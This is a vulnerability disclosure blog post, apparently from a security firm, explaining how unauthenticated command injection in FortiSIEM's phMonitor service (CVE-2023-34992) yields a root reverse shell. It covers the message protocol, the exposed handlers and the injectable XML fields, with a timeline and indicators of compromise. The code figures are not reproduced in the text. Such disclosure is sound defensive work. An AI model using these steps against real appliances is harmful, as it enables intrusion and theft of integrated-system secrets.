In early 2023, given some early success in auditing Fortinet appliances, I continued the effort and landed upon the Fortinet FortiSIEM. Several issues were discovered during this audit that ultimately lead to unauthenticated remote code execution in the context of the root user. The vulnerabilities were assigned CVE-2023-34992 with a CVSS3.0 score of 10.0 given that the access allowed reading of secrets for integrated systems, allowing for pivoting into those systems.
FortiSIEM Overview
The FortiSIEM allows customers to do many of the expected functions of a typical SIEM solution such as log collection, correlation, automated response, and remediation. It also allows for simple and complex deployments ranging from a standalone appliance to scaled out solutions for enterprises and MSPs.
In a FortiSIEM deployment, there are four types of roles that a system can have:
● Supervisor – for smaller deployments this is all that’s needed, and supervises other roles
● Worker – handles all the data coming from Collectors in larger environments
● Collector – used to scale data collection from various geographically separated network
environments, potentially behind firewalls
● Manager – can be used to monitor and manage multiple FortiSIEM instances
For the purposes of this research, I deployed an all-in-one architecture where the appliance contains all of the functionality within the Supervisor role. For more information about FortiSIEM key concepts refer to the documentation.
Exploring the System
One of the first things we do when auditing an appliance is to inspect the listening services given you have some time of shell access. Starting with the most obvious service, the web service, we see that it listens of tcp/443 and the proxy configuration routes traffic to an internal service listening on tcp/8080.
Figure 2. httpd.conf proxying traffic
We find that the backend web service is deployed via Glassfish, a Java framework similar to Tomcat in that it provides a simple way to deploy Java applications as WAR files. We find the WAR file that backs the service, unpack it, and decompile it. Inspecting some of the unauthenticated attack surface, we happen upon the LicenseUploadServlet.class
.
Figure 4. LicenseUploadServlet doPost method
We follow the code into this.notify()
, where we eventually observe it calling sendCommand()
, which interestingly sends a custom binary message with our input to the port tcp/7900.
We find that tcp/7900 hosts the phMonitor service, which listens on all interfaces, not just localhost.
Figure 6. phMonitor on tcp/7900
And it is also a compiled C++ binary.
Building a Client
Now that we’ve identified a pretty interesting attack surface, let’s build a client to interact with it in the same way the web service does. The message format is a pretty simple combination of:
- Command Type – The integer enum mapped to specific function handlers inside the phMonitor service
- Payload Length – The length of the payload in the message
- Send ID – An arbitrary integer value passed in the message
- Sequence ID – The sequence number of this message
- Payload – The specific data the function handler within phMonitor will operate on
Constructing the LicenseUpload message in little-endian format and sending it over an SSL wrapped socket will succeed in communicating with the service. Re-implementing the client messaging protocol in Python looks like the following:
Figure 7. phMonitor Python client
As a test that the client works, we send a command type of 29, mapped to handleProvisionServer
, and can observe in the logs located at /opt/phoenix/log/phoenix.log
that the message was delivered.
Figure 8. phMonitor client successful message sent
phMonitor Internals
The phMonitor service marshals incoming requests to their appropriate function handlers based on the type of command sent in the API request. Each handler processes the sent payload data in their own ways, some expecting formatted strings, some expecting XML.
Inside phMonitor, at the function phMonitorProcess::initEventHandler()
, every command handler is mapped to an integer, which is passed in the command message. Security Issue #1 is that all of these handlers are exposed and available for any remote client to invoke without any authentication. There are several dozen handlers exposed in initEventHandler()
, exposing much of the administrative functionality of the appliance ranging from getting and setting Collector passwords, getting and setting service passwords, initiating reverse SSH tunnels with remote collectors, and much more.
Figure 9. Sampling of handlers exposed
Finding a Bug
Given the vast amount of attack surface available unauthenticated within the phMonitor service, we begin with the easiest vulnerability classes. Tracing the calls between these handlers and calls to system()
we land of the handler handleStorageRequest()
, mapped to command type 81. On line 201, the handler expects the payload to be XML data and parses it.
Figure 10. handleStorageRequest() expecting XML payload
Later, we see that it attempts to extract the server_ip
and mount_point
values from the XML payload.
Further down on line 511, the handler formats a string with the parsed server_ip
and mount_point
values, which are user controlled.
Figure 12. Format string with user-controlled data
Finally, on line 556, the handler calls do_system_cancellable()
, which is a wrapper for system()
, with the user controlled command string.
Figure 13. do_system_cancellable command injection
Exploiting this issue is straightforward, we construct an XML payload that contains a malicious string to be interpreted, such as a reverse shell.
Figure 14. Reverse shell as root
Our proof of concept exploit can be found on our GitHub.
Indicators of Compromise
The logs in /opt/phoenix/logs/phoenix.logs
verbosely log the contents of messages received for the phMonitor service. Below is an example log when exploiting the system:
Figure 15. phoenix.logs contain payload contents
Timeline
5 May 2023 – Initial report
10 October 2023 – Command injection vulnerability fixed
22 February 2024 – RingZer0 BOOTSTRAP conference talk disclosing some of these details
20 May 2024 – This blog
NodeZero
Horizon3.ai clients and free-trial users alike can run a NodeZero operation to determine the exposure and exploitability of this issue.
Sign up for a free trial and quickly verify you’re not exploitable.